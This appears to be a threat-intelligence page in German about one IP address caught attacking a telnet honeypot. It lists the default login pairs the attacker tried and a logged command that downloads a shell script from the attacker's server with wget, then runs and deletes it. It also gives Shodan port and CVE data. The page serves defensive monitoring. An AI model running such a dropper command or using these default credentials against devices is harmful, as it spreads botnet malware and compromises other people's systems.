Aktive Bedrohung • NIEDRIG
64.89.163.118
Herkunftsland🇬🇧 Reino Unido
Erste Erkennung26.3.2026
Letzte Aktivitat27.3.2026
ISPNetiface America, Inc.
🎯
53
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
1
Malware
Geolokalisierung
- Land
- 🇬🇧 Reino Unido
- Stadt
- Unbekannt
- ASN
- AS401626
- ISP
- Netiface America, Inc.
Angriffsarten
ssh_telnet_honeypot
Angegriffene Ports
23
Zugehorige Malware
Versuchte Anmeldedaten
🔐support/support
4x🔐root/vizxv
3x🔐root/xc3511
3x🔐telnet/telnet
2x🔐root/root
1xAusgefuhrte Befehle
$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://64.89.163.118/cat.sh; chmod 777 cat.sh; sh cat.sh; rm -f cat.sh *4xShodan InternetDB ExpositionShodan
InternetDB-Daten, nicht in Echtzeit
Ports
802323
Schwachstellen
CVE-2022-22720CVE-2011-2688CVE-2024-38473CVE-2013-0941CVE-2022-29404CVE-2022-23943CVE-2025-59775CVE-2013-4365CVE-2013-2765CVE-2025-66200CVE-2023-38709CVE-2024-42516CVE-2022-37436CVE-2022-26377CVE-2022-28330CVE-2025-53020CVE-2023-31122CVE-2025-49812CVE-2023-25690CVE-2023-27522
CPEs
cpe:/a:apache:http_server:2.4.52cpe:/o:canonical:ubuntu_linux
Risikobewertung
35
/100
NiedrigMittelHochKritisch